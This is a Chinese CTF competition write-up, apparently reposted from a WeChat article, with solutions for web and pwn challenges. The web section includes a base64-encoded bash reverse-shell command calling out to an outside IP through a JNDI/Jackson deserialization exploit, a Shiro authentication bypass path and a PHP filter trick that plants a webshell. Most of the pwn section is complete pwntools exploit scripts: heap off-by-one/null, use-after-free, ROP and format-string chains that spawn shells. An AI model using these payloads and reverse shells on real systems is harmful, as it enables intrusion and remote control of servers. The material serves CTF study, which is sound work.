Crypto
签到
flag{GaqY7KtEtrVIX1Q5oP5iEBRCYXEAy8rT}
Web
1、zerocalc
读到
readFile('./src/index.js') = const express = require("express");const path = require("path");const fs = require("fs");const notevil = require("./notevil"); // patched something...const crypto = require("crypto");const cookieSession = require("cookie-session");const app = express();app.use(express.urlencoded({extended: true}));app.use(express.json());app.use(cookieSession({name: 'session',keys: [Math.random().toString(16)],})); //flag in root directory but name is randomizedconst utils = {async md5(s) {return new Promise((resolve, reject) = >{resolve(crypto.createHash("md5").update(s).digest("hex"));});},async readFile(n) {return new Promise((resolve, reject) = >{fs.readFile(n, (err, data) = >{if (err) {reject(err);} else {resolve(data);}});});},}const template = fs.readFileSync("./static/index.html").toString();function render(s) {return template.replace("{{res}}", s.join(' '));}app.use("/", async(req, res) = >{const e = req.body.e;const his = req.session.his || [];if (e) {try {const ret = (await notevil(e, utils)).toString();his.unshift(`$ {e} = $ {ret}`);if (his.length > 10) {his.pop();}} catch(error) {console.log(error);his.add(`$ {e} = wrong ? `);}req.session.his = his;}res.send(render(his));});app.use((err, res) = >{console.log(err);res.redirect('/');});app.listen(process.env.PORT || 8888);
网卡信息网络信息啥的都能直接读,读flag试试
2、Jack-Shiro
jackson反序列化打spring,反弹shell
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaC AtaSA+JiAvZGV2L3RjcC84MS43MC41OS4xMTIvMTg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}" -A "81.70.59.112"提前监听着18888端口
然后postman发送时候/;/json路由可以绕过shiro
["ch.qos.logback.core.db.JNDIConnectionSource",{"jndiLocation":"rmi://vpn:port/ifzli2"}]就有shell了:
3、new_hospital
dirsearch扫描下,没源码泄露啥的
200 7B http://123.60.75.243:32767/flag.php200 6KB http://123.60.75.243:32767/footer.php200 898B http://123.60.75.243:32767/header.php200 30KB http://123.60.75.243:32767/index.php200 30KB http://123.60.75.243:32767/index.php/login/200 3KB http://123.60.75.243:32767/js/200 18KB http://123.60.75.243:32767/news.php301 321B http://123.60.75.243:32767/old -> REDIRECTS TO: http://123.60.75.243:32767/old/200 28KB http://123.60.75.243:32767/old/200 19KB http://123.60.75.243:32767/online.php
直接访问flag.php没权限
有一个/old 估计是老站,也扫了一遍,这个里面倒是没flag.php
都点点各个页面,找到一个进去就有报错信息的
更改id参数,发现访问内容是由id参数决定的。
想到扫到的/old这个站,也进去了,发现不是由id参数决定的,第一次进去后,更改id参数,get到的结果是不变的。
如果一开始访问时候cookie是2.js,id无论怎么咋改,都还是file_get_contents(2.js)
猜测由cookie字段决定的访问内容
更改cookie为flag.php的目录:
4、EasyFilter
php伪协议的二次读入流读时解码即可
<?phpini_set("open_basedir","./");if(!isset($_GET['action'])){highlight_file(__FILE__);die();}if($_GET['action'] == 'w'){@mkdir("./files/");$content = $_GET['c'];$file = bin2hex(random_bytes(5));file_put_contents("./files/".$file,base64_encode($content));echo "./files/".$file;}elseif($_GET['action'] == 'r'){$r = $_GET['r'];$file = "./files/".$r;include("php://filter/resource=$file");}
写phpinfo 到 a0e57a3048
http://124.70.181.14:32768/?action=w&c=%3C?php%20phpinfo();?%3E打出phpinfo,目录的../个数一层一层试好像只有这么多个的时候才能触发
http://124.70.181.14:32768/?action=r&r=php://filter/read=convert.base64-decode/resource=../../../../../../files/a0e57a3048写马 64ee041d34
http://124.70.181.14:32768/?action=r&r=php://filter/read=convert.base64-decode/resource=../../../../../../files/64ee041d34post数据即可
pwn
1、bitflip
libc2.27 off by one , 给的bitflip的功能并没有用到
#!usr/bin/env python#-*- coding:utf8 -*-from pwn import *import syspc="./bitflip"reomote_addr=["124.71.130.185",49155]elf = ELF(pc)libc = elf.libccontext.binary=pccontext.terminal=["gnome-terminal",'-x','sh','-c']if len(sys.argv)==1:context.log_level="debug"p=process(pc)if len(sys.argv)==2 :if 'r' in sys.argv[1]:p = remote(reomote_addr[0],reomote_addr[1])if 'n' not in sys.argv[1]:context.log_level="debug"ru = lambda x : p.recvuntil(x,timeout=0.2)sn = lambda x : p.send(x)rl = lambda : p.recvline()sl = lambda x : p.sendline(x)rv = lambda x : p.recv(x)sa = lambda a,b : p.sendafter(a,b)sla = lambda a,b : p.sendlineafter(a,b)itr= lambda :p.interactive()ru7f = lambda : u64(ru('\x7f')[-6:].ljust(8,'\x00'))rv6 = lambda : u64(rv(6)+'\x00'*2)lg = lambda s: log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))bp = lambda src=None : attach(p,src)og = lambda libcpwd : map(int, subprocess.check_output(['one_gadget', '--raw', libcpwd]).split(' '))what_choice="Your choice: "ch_add="1"ch_dele="4"ch_edit="2"ch_show="3"what_size="Size: "what_c="Content: "what_idx="Index: "def add(idx,size):ru(what_choice)sl(ch_add)ru(what_idx)sl(str(idx))ru(what_size)sl(str(size))def dele(idx):ru(what_choice)sl(ch_dele)ru(what_idx)sl(str(idx))def edit(idx,c):ru(what_choice)sl(ch_edit)ru(what_idx)sl(str(idx))ru(what_c)sl(c) ##def show(idx):ru(what_choice)sl(ch_show)ru(what_idx)sl(str(idx))ru(what_c)add(0,8)add(1,8)dele(0)dele(1)add(0,0x18)show(0)heap_addr = rv6() -0x260lg('heap_addr')add(2,0x30)add(3,0x48)edit(0,'a'*0x18+'\x91')add(4,0x30)add(5,0x48)edit(3,'a'*0x48+'\x91')add(6,0x30)add(7,0x48)edit(5,'a'*0x48+'\x91')add(8,0x30)add(9,0x48)edit(7,'a'*0x48+'\x91')add(10,0x30)add(11,0x48)edit(9,'a'*0x48+'\x91')add(12,0x30)add(13,0x48)edit(11,'a'*0x48+'\x91')add(14,0x30)add(15,0x48)edit(13,'a'*0x48+'\x91')add(16,0x30)add(17,0x48)edit(15,'a'*0x48+'\x91')add(18,0x30)for i in range(8):dele(2*(i+1))add(19,0x50)show(19)libc_base = ru7f() - 0x3ebd20lg('libc_base')free_hook = libc_base + libc.sym['__free_hook']sys_addr = libc_base + libc.sym['system']dele(15)dele(17)edit(19, 'a'*0x38+p64(0x51)+p64(free_hook))add(20,0x40)add(21,0x40)edit(20, '/bin/sh\x00')edit(21, p64(sys_addr))dele(20)src='''# x/10xg $rebase()# b *$rebase(0xd43)binheap'''# bp(src)itr()
2、old_school
libc2.27 off by one
# -*- coding: utf-8 -*-from pwn import*from ctypes import *context.log_level='debug'context.arch='amd64'context.os = "linux"local = 0if local:r = process('./old_school')else:r = remote("121.36.194.21", 49153)sa = lambda s,n : r.sendafter(s,n)sla = lambda s,n : r.sendlineafter(s,n)sl = lambda s : r.sendline(s)sd = lambda s : r.send(s)rc = lambda n : r.recv(n)ru = lambda s : r.recvuntil(s)ti = lambda: r.interactive()libc = ELF("./libc-2.27.so")def debug():gdb.attach(r)pause()def lg(s,addr):print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))def add(index, size):sla("Your choice: ", "1")sla("Index: ", str(index))sla("Size: ", str(size))def edit(index, content):sla("Your choice: ", "2")sla("Index: ", str(index))sa("Content: ", content)def show(index):sla("Your choice: ", "3")sla("Index: ", str(index))def delete(index):sla("Your choice: ", "4")sla("Index: ", str(index))for i in range(7):add(i, 0xf8)#0-6add(7, 0x88) #7add(8, 0xe8) #8add(9, 0xf8) #9add(10, 0x10) #10edit(10, "/bin/sh\x00" + '\n')for i in range(7):delete(i)for i in range(7):add(i, 0x88)for i in range(7):delete(i)delete(7)edit(8, "a" * 0xe0 + p64(0x180) + '\x00')delete(9)for i in range(7):add(i, 0x88)add(7, 0x88) #7show(8)malloc_hook = (u64(r.recvuntil('\x7f')[-6:].ljust(8, "\x00")) & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)libc_base = malloc_hook - libc.sym['__malloc_hook']free_hook = libc_base + libc.sym["__free_hook"]system_addr = libc_base + libc.sym["system"]lg("libc_base", libc_base)add(11, 0xe0) #11delete(11)edit(8, p64(free_hook) + '\n')#debug()add(12, 0xe0) #12add(13, 0xe0) #13edit(13, p64(system_addr) + '\n')delete(10)r.interactive()
3、random_heap
libc2.27 uaf
堆随机起来了,考虑爆破。
坚持不懈的跑通了
# -*- coding: utf-8 -*-from pwn import*from ctypes import *#context.log_level='debug'context.arch='amd64'context.os = "linux"#context.terminal = ["tmux", "splitw", "-h"]local = 0if local:r = process('./random_heap')else:r = remote("124.71.140.198", 49153)sa = lambda s,n : r.sendafter(s,n)sla = lambda s,n : r.sendlineafter(s,n)sl = lambda s : r.sendline(s)sd = lambda s : r.send(s)rc = lambda n : r.recv(n)ru = lambda s : r.recvuntil(s)ti = lambda: r.interactive()libc = ELF("./libc-2.27.so")libcc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")def debug():gdb.attach(r)pause()def lg(s,addr):print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))def add(index, size):sla("Your choice: ", "1")sla("Index: ", str(index))sla("Size: ", str(size))def edit(index, content):sla("Your choice: ", "2")sla("Index: ", str(index))sla("Content: ", content)def show(index):sla("Your choice: ", "3")sla("Index: ", str(index))def delete(index):sla("Your choice: ", "4")sla("Index: ", str(index))v0 = libcc.time(0)libcc.srand(v0)for i in range(64):add(i, 0x80)a = libcc.rand()for i in range(64):delete(i)s = ""for i in range(64):show(i)s = ru("\n")if len(s) > 15 and s[14] == '\x7f':breakmalloc_hook = (u64(s[9:15].ljust(8, "\x00")) & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)libc_base = malloc_hook - libc.sym['__malloc_hook']free_hook = libc_base + libc.sym["__free_hook"]system_addr = libc_base + libc.sym["system"]lg("libc_base", libc_base)for i in range(64):edit(i, p64(free_hook))ss = ['a','a','a','a','a','a','a','a','a','a','a','a','a','a','a','a','a','a']for i in range(63):add(i, 0x80)edit(i, '/bin/sh\x00')a = libcc.rand() & 0xfprint int(a)if ss[int(a)] == 'b':edit(i, p64(system_addr))breakss[int(a)] = "b"print ssdelete(0)sl("cat flag")r.interactive()
4、sonic
栈溢出,给定程序基地址,且题目中已经有cli的路径,覆盖login_path为usr/bin/cli的地址即可
Exp:
#!usr/bin/env python#-*- coding:utf8 -*-from pwn import *import syspc="./sonic"reomote_addr=["123.60.63.90",6890]elf = ELF(pc)libc = elf.libccontext.binary=pccontext.terminal=["gnome-terminal",'-x','sh','-c']if len(sys.argv)==1:context.log_level="debug"p=process(pc)if len(sys.argv)==2 :if 'r' in sys.argv[1]:p = remote(reomote_addr[0],reomote_addr[1])if 'n' not in sys.argv[1]:context.log_level="debug"ru = lambda x : p.recvuntil(x,timeout=0.2)sn = lambda x : p.send(x)rl = lambda : p.recvline()sl = lambda x : p.sendline(x)rv = lambda x : p.recv(x)sa = lambda a,b : p.sendafter(a,b)sla = lambda a,b : p.sendlineafter(a,b)itr= lambda :p.interactive()ru7f = lambda : u64(ru('\x7f')[-6:].ljust(8,'\x00'))rv6 = lambda : u64(rv(6)+'\x00'*2)lg = lambda s: log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))bp = lambda src=None : attach(p,src)og = lambda libcpwd : map(int, subprocess.check_output(['one_gadget', '--raw', libcpwd]).split(' '))ru("main Address=0x")pie = int(rv(12),16) -0x7cflg('pie')src='''# x/10xg $rebase()b *$rebase(0x7fb)c'''# bp(src)main = pie+0x7cflogin_path = pie+0x201010username = pie + 0x201040ru("login:")p_rdi = pie+0x8c3p_rsi_r15 = pie + 0x8c1printf = pie + 0x5f0execve = pie + 0x610gets = pie+0x600pay = flat(['\x00'*0x28,p_rdi,login_path,gets,main,])sl(pay)sleep(0.1)sl(p64(pie+0x901))ru("login:")sl(p64(0))itr()'''0x00000000000008c3 : pop rdi ; ret0x00000000000008c1 : pop rsi ; pop r15 ; ret'''
5、old_school_revenge
2.27 off by null
# -*- coding: utf-8 -*-from pwn import*from ctypes import *context.log_level='debug'context.arch='amd64'context.os = "linux"#context.terminal = ["tmux", "splitw", "-h"]local = 0if local:r = process('./old_school_revenge')else:r = remote("123.60.63.39",49153)sa = lambda s,n : r.sendafter(s,n)sla = lambda s,n : r.sendlineafter(s,n)sl = lambda s : r.sendline(s)sd = lambda s : r.send(s)rc = lambda n : r.recv(n)ru = lambda s : r.recvuntil(s)ti = lambda: r.interactive()libc = ELF("./libc-2.27.so")def debug():gdb.attach(r)pause()def lg(s,addr):print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))def add(index, size):sla("Your choice: ", "1")sla("Index: ", str(index))sla("Size: ", str(size))def edit(index, content):sla("Your choice: ", "2")sla("Index: ", str(index))sla("Content: ", content)def show(index):sla("Your choice: ", "3")sla("Index: ", str(index))def delete(index):sla("Your choice: ", "4")sla("Index: ", str(index))for i in range(7):add(i, 0xf8)#0-6add(7, 0x88) #7add(8, 0xe8) #8add(9, 0xf8) #9add(10, 0x10) #10edit(10, "/bin/sh\x00" + '\n')for i in range(7):delete(i)for i in range(7):add(i, 0x88)for i in range(7):delete(i)delete(7)edit(8, "a" * 0xe0 + p64(0x180))delete(9)for i in range(7):add(i, 0x88)add(7, 0x88) #7show(8)malloc_hook = (u64(r.recvuntil('\x7f')[-6:].ljust(8, "\x00")) & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)libc_base = malloc_hook - libc.sym['__malloc_hook']free_hook = libc_base + libc.sym["__free_hook"]system_addr = libc_base + libc.sym["system"]lg("libc_base", libc_base)add(11, 0xe0) #11delete(11)edit(8, p64(free_hook) + '\n')#debug()add(12, 0xe0) #12add(13, 0xe0) #13edit(13, p64(system_addr) + '\n')#debug()delete(10)r.interactive()
6、oldecho
典型的格式化字符串漏洞,格式化字符串在bss段上,需要通过栈链来任意地址写,构造较为麻烦;
close(1)之后,无法正常输出,可以想办法可以改stdout的fileno为2,重定向到stderr;
这里先把返回地址改成main函数的首地址,使得栈抬高:
改之前:
改之后:
再次走到格式化字符串的位置,把返回地址改为ret,滑动到start函数的首地址:
然后栈上就会留下一个stdout指针:
然后把stdout的fileno改成2,就可以正常输出,泄露程序基地址和libc地址,之后在bss上布置orw,劫持rbp然后栈迁移到bss上执行即可读flag。
栈地址随机,要爆破几次
#!usr/bin/env python#-*- coding:utf8 -*-from pwn import *import syspc="./oldecho"reomote_addr=["123.60.32.152",49155]elf = ELF(pc)libc = elf.libccontext.binary=pccontext.terminal=["gnome-terminal",'-x','sh','-c']if len(sys.argv)==1:context.log_level="debug"p=process(pc)if len(sys.argv)==2 :if 'r' in sys.argv[1]:p = remote(reomote_addr[0],reomote_addr[1])if 'n' not in sys.argv[1]:context.log_level="debug"ru = lambda x : p.recvuntil(x,timeout=0.2)sn = lambda x : p.send(x)rl = lambda : p.recvline()sl = lambda x : p.sendline(x)rv = lambda x : p.recv(x)sa = lambda a,b : p.sendafter(a,b)sla = lambda a,b : p.sendlineafter(a,b)itr= lambda :p.interactive()ru7f = lambda : u64(ru('\x7f')[-6:].ljust(8,'\x00'))rv6 = lambda : u64(rv(6)+'\x00'*2)lg = lambda s: log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))bp = lambda src=None : attach(p,src)og = lambda libcpwd : map(int, subprocess.check_output(['one_gadget', '--raw', libcpwd]).split(' '))def edit(offset,value):sl('%{}c%{}$hhn'.format(value,offset))sleep(3)ru("Gift: 0x")stack_addr = int(rv(12),16)src='''b *$rebase(0xdbd)c'''p0,p1,p2 = 6,10,13p1_addr = stack_addr+0x8p2_addr = stack_addr+0x20ret_addr = stack_addr - 0x10edit(p0, u8(p64(p2_addr)[0]) )edit(p1, u8(p64(ret_addr)[0]) )edit(p0, u8(p64(p2_addr)[0])+1 )edit(p1, u8(p64(ret_addr)[1]))edit(p0, u8(p64(p2_addr)[0])+2 )edit(p1, u8(p64(ret_addr)[2]))edit(p0, u8(p64(p2_addr)[0])+3 )edit(p1, u8(p64(ret_addr)[3]))edit(p0, u8(p64(p2_addr)[0])+4 )edit(p1, u8(p64(ret_addr)[4]))edit(p0, u8(p64(p2_addr)[0])+5 )edit(p1, u8(p64(ret_addr)[5]))edit(p0, u8(p64(p2_addr)[0]) ) #restore# bp(src)edit(p2, 0x40) #0x40p0+=4p1+=2p2+=2new_ret = stack_addr-0x38edit(p1, u8(p64(new_ret)[0]))edit(p0, u8(p64(p2_addr)[0])+1)edit(p1, u8(p64(new_ret)[1]))edit(p0, u8(p64(p2_addr)[0])) #restore# bp(src)edit(p2, 0x3f) # E3F retnstdout_addr = stack_addr -0x80p2_addr = stack_addr -0x10p0=15p1=41p2=43p_stdout = 29edit(p1, u8(p64(stdout_addr)[0]))edit(p0, u8(p64(p2_addr)[0])+1)edit(p1, u8(p64(stdout_addr)[1]))edit(p0, u8(p64(p2_addr)[0])) #restoreedit(p2, 0x90)edit(p_stdout, 0x2)# bp(src)sl('%9$p%29$p')ru('0x')pie = int(rv(12),16)-0x202040libc_base = int(rv(14),16) - 0x3c5690# '''# 0x0000000000021112 : pop rdi ; ret# 0x00000000000202f8 : pop rsi ; ret# 0x00000000001436b1 : pop rax ; pop rdx ; pop rbx ; ret# 0x00000000000bc3f5: syscall; ret;# '''fmt_addr = pie + 0x202040p_rdi = libc_base +0x0000000000021112p_rsi = libc_base +0x00000000000202f8p_rax_rdx_rbx = libc_base +0x00000000001436b1syscall = libc_base +0x00000000000bc3f5ret = p_rdi+1 #rdi+0xa0=rop_base,+0xa8=retflag_str_addr = pie + 0x202020orw_base = fmt_addr + 0x10rop_base=fmt_addr +0x20 #注意rop_baseflag_addr=orw_baseORW=flat(['./flag'.ljust(0x10,'\x00'),p_rdi,flag_addr,p_rsi,4,p_rax_rdx_rbx,2,4,0,syscall,p_rdi,1,p_rsi,flag_str_addr,p_rax_rdx_rbx,0,0x50,0,syscall,p_rdi,2,p_rsi,flag_str_addr,p_rax_rdx_rbx,1,0x40,0,syscall])rop_base_addr = stack_addr -0x138rop_base -= 8edit(p1, u8(p64(rop_base_addr)[0]))edit(p0, u8(p64(p2_addr)[0])+1)edit(p1, u8(p64(rop_base_addr)[1]))edit(p0, u8(p64(p2_addr)[0])) #restore# bp(src)edit(p2, u8(p64(rop_base)[0]))edit(p1, u8(p64(rop_base_addr)[0])+1)edit(p2, u8(p64(rop_base)[1]))edit(p1, u8(p64(rop_base_addr)[0])+2)edit(p2, u8(p64(rop_base)[2]))edit(p1, u8(p64(rop_base_addr)[0])+3)edit(p2, u8(p64(rop_base)[3]))edit(p1, u8(p64(rop_base_addr)[0])+4)edit(p2, u8(p64(rop_base)[4]))edit(p1, u8(p64(rop_base_addr)[0])+5)# bp(src)edit(p2, u8(p64(rop_base)[5]))leave_ret = pie+0xe3eleave_ret_addr = stack_addr -0x128edit(p1, u8(p64(leave_ret_addr)[0])) #restoreedit(p2, u8(p64(leave_ret)[0]))edit(p1, u8(p64(leave_ret_addr)[0])+1) #restoreedit(p2, u8(p64(leave_ret)[1]))edit(p1, u8(p64(leave_ret_addr-8)[0])) #restore# bp(src)pay = '%{}c%{}$hhn'.format(0x3f,p2)pay = pay.ljust(0x10,'a') + ORWsl(pay)lg('pie')lg('libc_base')lg('stack_addr')itr()
7、bornote
libc-2.31 off by null
开始时随机申请了一个size的chunk,所以调试前先patch一下,最后爆破成功的概率1/16
#!usr/bin/env python#-*- coding:utf8 -*-from pwn import *import syspc="./bornote"reomote_addr=["121.36.250.162",49155]elf = ELF(pc)libc = elf.libccontext.binary=pccontext.terminal=["gnome-terminal",'-x','sh','-c']if len(sys.argv)==1:context.log_level="debug"p=process(pc)if len(sys.argv)==2 :if 'r' in sys.argv[1]:p = remote(reomote_addr[0],reomote_addr[1])if 'n' not in sys.argv[1]:context.log_level="debug"ru = lambda x : p.recvuntil(x,timeout=0.2)sn = lambda x : p.send(x)rl = lambda : p.recvline()sl = lambda x : p.sendline(x)rv = lambda x : p.recv(x)sa = lambda a,b : p.sendafter(a,b)sla = lambda a,b : p.sendlineafter(a,b)itr= lambda :p.interactive()ru7f = lambda : u64(ru('\x7f')[-6:].ljust(8,'\x00'))rv6 = lambda : u64(rv(6)+'\x00'*2)lg = lambda s: log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))bp = lambda src=None : attach(p,src)og = lambda libcpwd : map(int, subprocess.check_output(['one_gadget', '--raw', libcpwd]).split(' '))what_choice="cmd: "ch_add="1"ch_dele="2"ch_edit="3"ch_show="4"what_size="Size: "what_c="Note: "what_idx="Index: "def add(size):ru(what_choice)sl(ch_add)ru(what_size)sl(str(size))def dele(idx):ru(what_choice)sl(ch_dele)ru(what_idx)sl(str(idx))def edit(idx,c):ru(what_choice)sl(ch_edit)ru(what_idx)sl(str(idx))ru(what_c)sl(c) ##def show(idx):ru(what_choice)sl(ch_show)ru(what_idx)sl(str(idx))ru(what_c)libc_base = 0heap_base = 0def leak():global libc_baseru("username: ")sl('Y1f4n')# max_count 10 size 0-0x654add(0x90) #0add(0x28) #1add(0x28) #2add(0x4f0) #3add(0x28) #4dele(3)add(0x4f0)show(3)# libc_base = ru7f() - 0x1ebbe0# lg('libc_base')def game():global heap_basedele(2)dele(1)add(0x28)add(0x28)show(1)heap_base = rv6() - 0x13030-0x40lg('heap_base')pay = flat([0,0xf1,heap_base+0x12fb0,heap_base+0x12fb0,heap_base+0x12fa0,heap_base+0x12fa0])edit(0,pay)edit(2, 'a'*0x20+p64(0xf0))dele(3)add(0xe0) #3dele(2)dele(1)free_hook = libc_base + libc.sym['__free_hook']sys_addr = libc_base + libc.sym['system']pay = flat(['a'*0x80,0,0x31,free_hook])edit(3,pay)add(0x28)add(0x28)edit(1, '/bin/sh\x00')edit(2, p64(sys_addr))dele(1)src='''heapbin'''# bp(src)while True:try:leak()s=p.recvuntil('\x7f',timeout=0.2) ##if len(s)==0:raise Exception('')libc_base=u64(s[-6:]+'\x00'*2) - 0x1ebbe0breakexcept Exception:p.close()p=process(pc)p = remote(reomote_addr[0],reomote_addr[1])continuegame()lg('libc_base')sl('cat flag')itr()
8、pwnpwn
给程序基地址,泄露canary,栈溢出
# -*- coding: utf-8 -*-from pwn import*from ctypes import *context.log_level='debug'context.arch='amd64'context.os = "linux"#context.terminal = ["tmux", "splitw", "-h"]local = 0if local:r = process('./pwnpwn')else:r = remote("124.71.156.217", 49153)sa = lambda s,n : r.sendafter(s,n)sla = lambda s,n : r.sendlineafter(s,n)sl = lambda s : r.sendline(s)sd = lambda s : r.send(s)rc = lambda n : r.recv(n)ru = lambda s : r.recvuntil(s)ti = lambda: r.interactive()libc = ELF("./libc-2.23.so")libcc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")def debug():gdb.attach(r)pause()def lg(s,addr):print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))sla("welcome to mimic world,try something\n", "1")ru("0x")vuln_addr = int(rc(12), 16)shell_addr = vuln_addr - 0x94pie = vuln_addr - 0x9b9bin_sh = pie + 0x202010pop_rdi = pie + 0xb83system_addr = pie + 0x951lg("pie", pie)sl("2")sa("hello", "a" * 0x69)ru("a" * 0x69)canary = u64('\x00' + rc(7))lg("canary", canary)sl("a" * 0x68 + p64(canary) + 'a' * 8 + p64(pop_rdi) + p64(bin_sh) + p64(system_addr))r.interactive()
实操推荐:https://www.hetianlab.com/pages/CTFLaboratory.jsp
文章来源: http://mp.weixin.qq.com/s?__biz=MjM5MTYxNjQxOA==&mid=2652882361&idx=1&sn=e60dfcb9a26931f510185316cd9d3136&chksm=bd59b9748a2e3062c5884da7cd75afab3e5b3f99b6307e89905ace0420e1ccef7f738df54675#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh